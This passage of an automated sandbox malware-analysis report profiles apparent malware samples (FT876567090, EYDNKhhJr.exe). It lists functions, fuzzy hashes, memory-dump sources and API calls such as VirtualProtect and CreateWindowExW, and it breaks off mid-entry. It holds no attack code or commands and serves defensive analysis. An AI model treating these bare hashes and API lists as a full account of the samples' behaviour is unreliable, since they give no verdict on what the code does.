Source File: 0000000A.00000002.3387842571.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_100d000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c0d666127f9905d14e9a10f4295e1cd904750376396ffd9d8105486606df5de
Instruction ID: 95670108bff79c6a0cd09f88a0171d5fece67fd54fcf8b7706a7e5dfec4da21b
Opcode Fuzzy Hash: 6c0d666127f9905d14e9a10f4295e1cd904750376396ffd9d8105486606df5de
Instruction Fuzzy Hash: 5AF0C271404344AFF7518E5AC884B62FFD8EB41664F18C09AFD8C0E282C3799845CBB1

Function 02D52DB8 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ca1e7d7caeaa02e1041743fdd14cbb85222a842990dab10a71d02b28239b1d9
Instruction ID: 78521aaf40a0acc1c9eb08ab082036529fce2171e85d19f5876abda048a9bb7c
Opcode Fuzzy Hash: 7ca1e7d7caeaa02e1041743fdd14cbb85222a842990dab10a71d02b28239b1d9
Instruction Fuzzy Hash: 4CE09231A282A74AC71797B4B8540EEBF30EDC6110B1886A7D49467041EB20255AC3A1

Function 02D56C47 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c25917f5e630a673a0ab6dbacfcd983696b57507e419606d278894fbf070de7
Instruction ID: 4e01a54fa991703a9d4336670ec9fdabde853c96fe3ac8e21ed8d868c56a5ce7
Opcode Fuzzy Hash: 1c25917f5e630a673a0ab6dbacfcd983696b57507e419606d278894fbf070de7
Instruction Fuzzy Hash: C7E0263040C3868FDB079F32A8A02E53FB5DD4B201B4449B1C1884A167FAA81C5B83A6

Function 02D52DC8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d84e3cf7f04f9038a1c289f69d9c7ca831ed9ebd974bcc300599d94df1ad0aa7
Instruction ID: 73aaf64c7bb5018b7e65ebf16bc7ffe48f22b4e9635f271f6c0d446ca8962ddd
Opcode Fuzzy Hash: d84e3cf7f04f9038a1c289f69d9c7ca831ed9ebd974bcc300599d94df1ad0aa7
Instruction Fuzzy Hash: 57D02B31D2022B53CB00E7A1FC004DFF738EEC1220B404222E91033000FB302658C6F0

Function 02D5B4BD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb7b6e61f542e1ddf0977637017b994c12886cdbc8ebfa51d4effee5d980030d
Instruction ID: 64fbc9c493179a82a4ce05ae3ebf5c930a02a3166cf218ce3ee497871262f250
Opcode Fuzzy Hash: cb7b6e61f542e1ddf0977637017b994c12886cdbc8ebfa51d4effee5d980030d
Instruction Fuzzy Hash: 0CD0177BB400089FCB008F88E840DDDB7B6FB8C220B008016EA11E3260C6319821CB60

Function 02D58999 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7525a8c20b581b849181c66dcf3648070b22000f771b27d12aa81a5ee2214468
Instruction ID: fc6db7d47adb42767dfabca23b33c8f901be9f2379bbf3ad067e9243c36bbef4
Opcode Fuzzy Hash: 7525a8c20b581b849181c66dcf3648070b22000f771b27d12aa81a5ee2214468
Instruction Fuzzy Hash: E0D0123234D2C04FD7029AA828964A5BFA0D98A17130948BBEEC0CB317D41A482ED722

Function 02D56C58 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 381cbe069c9a84f217499572d825f0005294c8085bf7e66dec74696d9b46bcbf
Instruction ID: a200aad70627e59f116b4c573a9f6b09d35462732a725a1e84f2dbd67bc1662a
Opcode Fuzzy Hash: 381cbe069c9a84f217499572d825f0005294c8085bf7e66dec74696d9b46bcbf
Instruction Fuzzy Hash: CEC0123054860B8AE546EB75F9546D5377AE689200B404E34920919155EFBD1C4546EA

Non-executed Functions

Function 00417081 Relevance: 15.3, APIs: 10, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0041718A
_malloc.LIBCMT ref: 0041724C
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF

Memory Dump Source

Source File: 0000000A.00000002.3386681067.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_401000_FT876567090.jbxd

Similarity

API ID: __freea_malloc$___convertcp$___ansicp_memset
String ID:
API String ID: 3383179575-0
Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 0000000A.00000002.3386681067.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_401000_FT876567090.jbxd

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Function 0040C73D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Strings

'B, xrefs: 0040C70F

Memory Dump Source

Source File: 0000000A.00000002.3386681067.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_401000_FT876567090.jbxd

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID: 'B
API String ID: 2805327698-2787509829
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Function 004105D5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__crt_waiting_on_module_handle.LIBCMT ref: 004105F2
__lock.LIBCMT ref: 0041064D
__lock.LIBCMT ref: 0041066E
___addlocaleref.LIBCMT ref: 0041068C

Strings

KERNEL32.DLL, xrefs: 004105E1, 004105E6, 004105F1
@.B, xrefs: 00410681

Memory Dump Source

Source File: 0000000A.00000002.3386681067.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_401000_FT876567090.jbxd

Similarity

API ID: __lock$___addlocaleref__crt_waiting_on_module_handle
String ID: @.B$KERNEL32.DLL
API String ID: 1628550938-2520587274
Opcode ID: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
Instruction ID: ea0ea8473cec590b50870dd3b4b8be5e3c50d09318c2f51e843d2d197a1947a1
Opcode Fuzzy Hash: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
Instruction Fuzzy Hash: F4119071940701EED720AF76D90179EBBE0AF44314F10892FE499A72A1CBB89A958F5C

Function 004057B0 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Memory Dump Source

Source File: 0000000A.00000002.3386681067.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_401000_FT876567090.jbxd

Similarity

API ID: _malloc$AllocateHeap
String ID:
API String ID: 680241177-0
Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 0000000A.00000002.3386681067.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_401000_FT876567090.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Function 004146FA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

___addlocaleref.LIBCMT ref: 0041470C
___removelocaleref.LIBCMT ref: 00414717
___freetlocinfo.LIBCMT ref: 0041472B

Part of subcall function 00414489: ___free_lconv_mon.LIBCMT ref: 004144CF
Part of subcall function 00414489: ___free_lconv_num.LIBCMT ref: 004144F0
Part of subcall function 00414489: ___free_lc_time.LIBCMT ref: 00414575

Strings

@.B, xrefs: 00414722
@.B, xrefs: 00414709

Memory Dump Source

Source File: 0000000A.00000002.3386681067.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_401000_FT876567090.jbxd

Similarity

API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
String ID: @.B$@.B
API String ID: 4212647719-183327057
Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
Instruction ID: 8e9b8205a585dc9325c25650a27042e0212317e7447dcce9b0fe23aa5a8dd77f
Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
Instruction Fuzzy Hash: BDE0863250192255CE35261D76806EF93A98FD3725B3A017FF864AF7D8EB2C4CC0809D

Function 0040FA58 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 0040FA7A
__calloc_crt.LIBCMT ref: 0040FA93

Strings

P$B, xrefs: 0040FAAA
`$B, xrefs: 0040FACC

Memory Dump Source

Source File: 0000000A.00000002.3386681067.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_401000_FT876567090.jbxd

Similarity

API ID: __calloc_crt
String ID: P$B$`$B
API String ID: 3494438863-235554963
Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
Instruction ID: 4bdca0f49684ef71ac3198dcc3f656e5d5ce7fed137673697bf40858e87bd1f9
Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
Instruction Fuzzy Hash: 6011A3327446115BE7348B1DBD50F662391EB84728BA4423BE619EA7E0E77CD8864A4C

Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 0000000A.00000002.3386681067.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_401000_FT876567090.jbxd

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 0000000A.00000002.3386681067.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_401000_FT876567090.jbxd

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 0040BB6E
__fileno.LIBCMT ref: 0040BB8E
__locking.LIBCMT ref: 0040BB95
__flsbuf.LIBCMT ref: 0040BBC0

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 0000000A.00000002.3386681067.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_401000_FT876567090.jbxd

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C

Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 0000000A.00000002.3386681067.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_401000_FT876567090.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Analysis Process: EYDNKhhJr.exePID: 4176, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	11.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	224
Total number of Limit Nodes:	9

Executed Functions

Function 02ACAE48 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02ACB09E

Memory Dump Source

Source File: 0000000C.00000002.2212365859.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ac0000_EYDNKhhJr.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2e614f589bbc8a9516991d4e7a23939ae662cd4b4a5e66b752547e6da62f2cfd
Instruction ID: fb2950a7921cadfb64976b40287e19d3e0db764b60d34f8c150a1e83adf44606
Opcode Fuzzy Hash: 2e614f589bbc8a9516991d4e7a23939ae662cd4b4a5e66b752547e6da62f2cfd
Instruction Fuzzy Hash: DF7148B0A00B098FD724DF29D49576ABBF1BF48304F10892EE48AD7A51DB35E945CF91

Function 052418E4 Relevance: 1.6, APIs: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05241A02

Memory Dump Source

Source File: 0000000C.00000002.2215809028.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5240000_EYDNKhhJr.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 3e06947299da8c7cc56d45fcd94e68db12034815b648be7221fac8c492ab9ee5
Instruction ID: d94f298fedab8b1089befd0e55893e2a826eea4584a1464f150003d39ab231e9
Opcode Fuzzy Hash: 3e06947299da8c7cc56d45fcd94e68db12034815b648be7221fac8c492ab9ee5
Instruction Fuzzy Hash: 0951E2B1D10359DFDF14CF99C984ADEBBB5BF48310F24822AE819AB210D7759985CF90

Function 052418F0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05241A02

Memory Dump Source

Source File: 0000000C.00000002.2215809028.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5240000_EYDNKhhJr.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 91882c7f4366cb0e37e83ace8208daa5d879e109a5e7c66ae4d4039941767b9e
Instruction ID: a8af544c5197306eac0694c172af5523f4b7abbac6ec14cbc7509053e19dff7a
Opcode Fuzzy Hash: 91882c7f4366cb0e37e83ace8208daa5d879e109a5e7c66ae4d4039941767b9e
Instruction Fuzzy Hash: E741B0B1D10359DFDB14CF99C884ADEBBB5BF88310F24812AE819AB210D7759995CF90

Function 02AC44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02AC59C9

Memory Dump Source

Source File: 0000000C.00000002.2212365859.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ac0000_EYDNKhhJr.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f66b8b885306bcce14a8fb0d147832df72e6651e918c908d2fb855cb9d029184
Instruction ID: 40035bfaacdef7b259a6c8dff8e04e46457a835f715007d68ded129ce0403c40
Opcode Fuzzy Hash: f66b8b885306bcce14a8fb0d147832df72e6651e918c908d2fb855cb9d029184
Instruction Fuzzy Hash: 7441C170C0071DCBEB24CFAAC8847CEBBB5BF49704F60805AD408AB255DBB56945CF91

Function 02AC590D Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02AC59C9

Memory Dump Source

Source File: 0000000C.00000002.2212365859.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ac0000_EYDNKhhJr.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8758a34cf441aaaf9dc4e778e4ab2308e7c5553690e1bdc10ce4e3de2c845466
Instruction ID: f5763f7819b98bb95aede033ccb90d13e244af6bbd52ddfaf32e8543631d83ad
Opcode Fuzzy Hash: 8758a34cf441aaaf9dc4e778e4ab2308e7c5553690e1bdc10ce4e3de2c845466
Instruction Fuzzy Hash: B041B070C0071DCBEB24CFAAC884BDEBBB1BF49704F60816AD448AB255DB756949CF51

Function 05244050 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05244111

Memory Dump Source

Source File: 0000000C.00000002.2215809028.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5240000_EYDNKhhJr.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: dd644d807e3976c6fa0d400d8ff74e559bbbcf26732cc932cbf43b948def3ae3
Instruction ID: edde48dc29a39ff0c108e0e31425fcecff4bcb6f14c680ab5bee81b6d1943539
Opcode Fuzzy Hash: dd644d807e3976c6fa0d400d8ff74e559bbbcf26732cc932cbf43b948def3ae3
Instruction Fuzzy Hash: 864138B4910309DFDB18DF89C848BAABBF6FF88314F258459D519AB321D375A841CFA0

Function 02ACB830 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02ACD6E6,?,?,?,?,?), ref: 02ACD7A7

Memory Dump Source

Source File: 0000000C.00000002.2212365859.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ac0000_EYDNKhhJr.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e256c35d10a17d78c173f0dc93c65c2c0ec1d85dfbaf557647c3c6a87fc40f6e
Instruction ID: b9329b28211188f915fcb40bf2d57a79ddab8f952e3fc81f4024e739dab644e8
Opcode Fuzzy Hash: e256c35d10a17d78c173f0dc93c65c2c0ec1d85dfbaf557647c3c6a87fc40f6e
Instruction Fuzzy Hash: F721E5B5900648EFDB10CF9AD984ADEBBF4EB48310F14846AE914B7310D378A954CFA5

Function 02ACD719 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02ACD6E6,?,?,?,?,?), ref: 02ACD7A7

Memory Dump Source

Source File: 0000000C.00000002.2212365859.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ac0000_EYDNKhhJr.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a12f6a3dd6e6a0506123ebb56a086a8e49da53b11cf1ab279a8e6e8ae9f05a4a
Instruction ID: 5969a59a353af11de52095ca29c3086d92dafe8bcedd358dc8d252029c73726d
Opcode Fuzzy Hash: a12f6a3dd6e6a0506123ebb56a086a8e49da53b11cf1ab279a8e6e8ae9f05a4a
Instruction Fuzzy Hash: 1E21E4B5900249EFDB10CFAAD984ADEBBF5EB48314F14842AE918B7310D378A954CF61

Function 07417CC0 Relevance: 1.6, APIs: 1, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07417D33

Memory Dump Source

Source File: 0000000C.00000002.2217288614.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7410000_EYDNKhhJr.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9704dc5b65a77559f0b070e8dcb89811258b98b6febe61022ce5b1afe5eeaaad
Instruction ID: 58f7b3eed97e9527d3184505313a4aca7f0bf6082090e7ae05c3439e6d6ebc94
Opcode Fuzzy Hash: 9704dc5b65a77559f0b070e8dcb89811258b98b6febe61022ce5b1afe5eeaaad
Instruction Fuzzy Hash: D121E4B5900649DFDB10DF9AC984BDEFBF4FB48320F10842AE958A7250D378A644CFA5

Function 07417CB8 Relevance: 1.6, APIs: 1, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07417D33

Memory Dump Source

Source File: 0000000C.00000002.2217288614.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7410000_EYDNKhhJr.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
